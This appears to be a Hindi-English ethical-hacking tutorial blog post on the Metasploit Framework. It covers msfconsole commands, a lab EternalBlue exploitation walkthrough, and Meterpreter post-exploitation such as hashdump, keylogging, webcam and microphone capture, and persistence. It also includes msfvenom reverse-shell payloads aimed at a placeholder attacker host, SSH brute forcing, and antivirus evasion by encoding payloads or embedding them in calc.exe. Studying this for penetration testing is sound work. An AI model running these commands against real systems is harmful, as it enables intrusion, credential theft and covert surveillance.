🚀 Cyber Security New Batch Start from 1 JunEnroll Now
Cyber Defence
CYBERDEFENCE
Ethical Hacking

Metasploit Tutorial: Complete Exploitation Framework Guide

Metasploit framework tutorial in Hindi — msfconsole commands, exploit modules, meterpreter shell, payload generation with msfvenom, and practical exploitation of vulnerable systems.

Amit Kumar
Amit KumarEthical Hacker & Founder
6 min read

Metasploit Tutorial: Complete Exploitation Framework Guide

Metasploit Framework open-source penetration testing tool hai jo vulnerability research, exploit development, aur payload delivery ke liye use hota hai. Yeh Metasploit tutorial aapko exploitation ki complete understanding dega — basic commands se lekar advanced meterpreter techniques tak.

Metasploit Framework Overview

Metasploit HD Moore dvaara 2003 mein create kiya gaya tha. Aaj yeh Rapid7 dvaara maintained aur developed kiya jaata hai. Yeh security testing duniya ka sabse widely used framework hai.

Metasploit ke core capabilities mein exploit development research shamil hai. Pre-built exploit modules ready-to-use hain. Payload generation aur delivery bhi possible hai. Auxiliary modules reconnaissance aur DoS ke liye use hote hain. Post modules compromised systems par further actions ke liye hain.

Metasploit Architecture

Module Types

Exploit modules vulnerabilities ko target karte hain. Pre-built aur custom exploits available hain.

Payload modules shellcode execute karte hain jo successful exploitation ke baad run hota hai. Types: Singles (standalone payloads), Stagers (connection establish karte hain), Stages (stagers ke through download hote hain).

Auxiliary modules exploitation ke liye nahi balki information gathering, scanning, aur DoS ke liye use hote hain.

Encoder modules payloads ko encode karte hain antivirus aur detection se bachne ke liye.

Post modules compromised system par post-exploitation tasks ke liye hain.

Metasploit Installation

Kali Linux mein

Kali Linux mein Metasploit pahle se installed aata hai:

```bash

msfconsole

```

Database Setup

```bash

sudo msfdb init

msfdb status

```

Database workspace management, host tracking, aur module caching ke liye zaroori hai.

Metasploit Console (msfconsole) Basics

Starting Metasploit

```bash

msfconsole

msfconsole -v # Verbose output

```

Core Commands

```bash

help # Available commands ki list

search <keyword> # Modules search karein

use <module> # Module load karein

info # Current module ki details

show options # Module options dikhayein

set <option> <value> # Option set karein

unset <option> # Option unset karein

setg <option> <value> # Global option set karein

exploit # Exploitation start karein

run # Auxiliary modules ke liye

back # Current module se exit karein

exit # msfconsole se bahar jaayein

```

Database Workflow in Metasploit

Workspace Management

```bash

workspace # Current workspace dekhein

workspace -a new_test # New workspace create karein

workspace <name> # Workspace switch karein

workspace -d <name> # Workspace delete karein

```

Host Scanning with Database Integration

```bash

db_nmap -sV 192.168.1.0/24

hosts # Scanned hosts dekhein

services # Discovered services dekhein

vulns # Vulnerabilities dekhein

```

db_nmap results automatically database mein save karta hai.

Metasploit Exploitation Step by Step

Step 1: Vulnerability Search

```bash

search type:exploit name:smb

search type:exploit cve:2017-0144 # EternalBlue

search target:Windows

```

Step 2: Module Select karna

```bash

use exploit/windows/smb/ms17_010_eternalblue

```

Step 3: Options Set karna

```bash

show options

set RHOSTS 192.168.1.100

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.50

set RPORT 445

```

Step 4: Exploitation

```bash

exploit

# ya

run -j # Background mein run karne ke liye

```

Meterpreter Shell Basics

Meterpreter advanced payload hai jo stealth aur powerful post-exploitation capabilities provide karta hai.

Meterpreter Commands After Access

```bash

sysinfo # System information

getuid # Current user

getpid # Current process ID

ps # Running processes

shell # Interactive command shell

hashdump # Password hashes dump karein

screenshot # Screenshot lo

webcam_list # Available webcams dekhein

webcam_snap # Webcam se photo lo

record_mic # Microphone se audio record karein

```

Privilege Escalation in Meterpreter

```bash

getsystem # Automatic privilege escalation

getprivs # Available privileges

```

Post-Exploitation Modules

```bash

run post/windows/gather/enum_applications

run post/windows/gather/enum_logged_on_users

run post/windows/manage/money # Persistence establish

run post/windows/capture/keylog_recorder # Keylogger

```

Meterpreter Session Management

```bash

background # Current session background mein bhejein

sessions -l # All sessions list karein

sessions -i 1 # Specific session mein jaayein

sessions -K # All sessions kill karein

```

Msfvenom: Standalone Payload Generation

Msfvenom Metasploit ke bahar standalone payloads generate karne ke liye use hota hai.

Basic Payload Generation

Linux reverse shell:

```bash

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell.elf

chmod +x shell.elf

```

Windows executable:

```bash

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe

```

PHP reverse shell:

```bash

msfvenom -p php/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw -o shell.php

```

Python payload:

```bash

msfvenom -p python/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw

```

Payload Options

-f output format define karta hai (elf, exe, apk, jar, etc.). -p payload specify karta hai. -e encoder use karne ke liye. -i iterations (encoding ka cycles). -x custom executable template ke liye. -k payload ko thread mode mein run karne ke liye.

Handler Setup

Msfvenom se generated payload ke liye handler:

```bash

use exploit/multi/handler

set PAYLOAD linux/x86/meterpreter/reverse_tcp

set LHOST ATTACKER_IP

set LPORT 4444

exploit -j

```

Common Metasploit Auxiliary Modules

Port Scanning

```bash

use auxiliary/scanner/portscan/tcp

set RHOSTS 192.168.1.0/24

set PORTS 1-1000

run

```

SMB Enumeration

```bash

use auxiliary/scanner/smb/smb_version

set RHOSTS 192.168.1.0/24

run

```

HTTP Enumeration

```bash

use auxiliary/scanner/http/http_version

set RHOSTS target.com

run

```

SSH Brute Force

```bash

use auxiliary/scanner/ssh/ssh_login

set RHOSTS 192.168.1.100

set USER_FILE /root/users.txt

set PASS_FILE /root/passwords.txt

run

```

Metasploit Tutorial: Practical Walkthrough

Scenario: Exploiting Windows SMB (EternalBlue)

Lab Setup:

Kali Linux attacker machine. Metasploitable2 ya Windows 7 target machine. Same network mein dono machines.

Step 1: Target Scan

```bash

db_nmap -sS -sV -p 445 192.168.56.0/24

```

Target par port 445 open dikhna chahiye — SMB service.

Step 2: Search Exploit

```bash

search type:exploit name:ms17-010

```

EternalBlue exploit dikhega.

Step 3: Load Exploit

```bash

use exploit/windows/smb/ms17_010_eternalblue

show options

```

Step 4: Configure

```bash

set RHOSTS 192.168.56.101

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.56.102

set LPORT 4444

```

Step 5: Exploit

```bash

exploit

```

Meterpreter session open hona chahiye.

Step 6: Post-Exploitation

```bash

sysinfo

getuid

getsystem

hashdump

shell

```

Metasploit Evasion Techniques

Antivirus detection se bachne ke tarike:

Encoding Payloads

```bash

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

```

Template Use

Legitimate executable ko template banayein:

```bash

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -x calc.exe -k -f exe -o payload.exe

```

Metasploit Resources for Learning

Official Metasploit Documentation comprehensive guide provide karta hai. Offensive Security's Metasploit Unleashed free online course hai. Metasploit Community Resources official website par available hain. Practice labs TryHackMe aur HackTheBox par available hain.

Metasploit Tutorial Summary

Metasploit Framework penetration testing ka most powerful tool hai. Is tutorial mein cover kiya:

  • Metasploit architecture aur module types
  • msfconsole commands aur database workflow
  • Exploitation step by step
  • Meterpreter shell aur post-exploitation
  • Msfvenom payload generation
  • Auxiliary modules for reconnaissance
  • Practical EternalBlue exploitation walkthrough
  • Evasion techniques aur encoding

Metasploit seekhna ongoing process hai — regular practice aur new modules explore karein. Cyber Defence ka ethical hacking course Metasploit ko comprehensively cover karta hai hands-on labs ke saath. Nmap commands tutorial aur privilege escalation tutorial bhi available hain jo aapki complete penetration testing workflow ko build karte hain.

Metasploit professional-grade tool hai jo real-world security assessments ke liye essential hai. Structured learning aur practical experience dono zaroori hain is field mein.

Talk to a Cyber Defence Expert

Get a free consultation on cybersecurity, training and certifications. Our team responds within 10 minutes during business hours.

WhatsApp Us Now75175 72000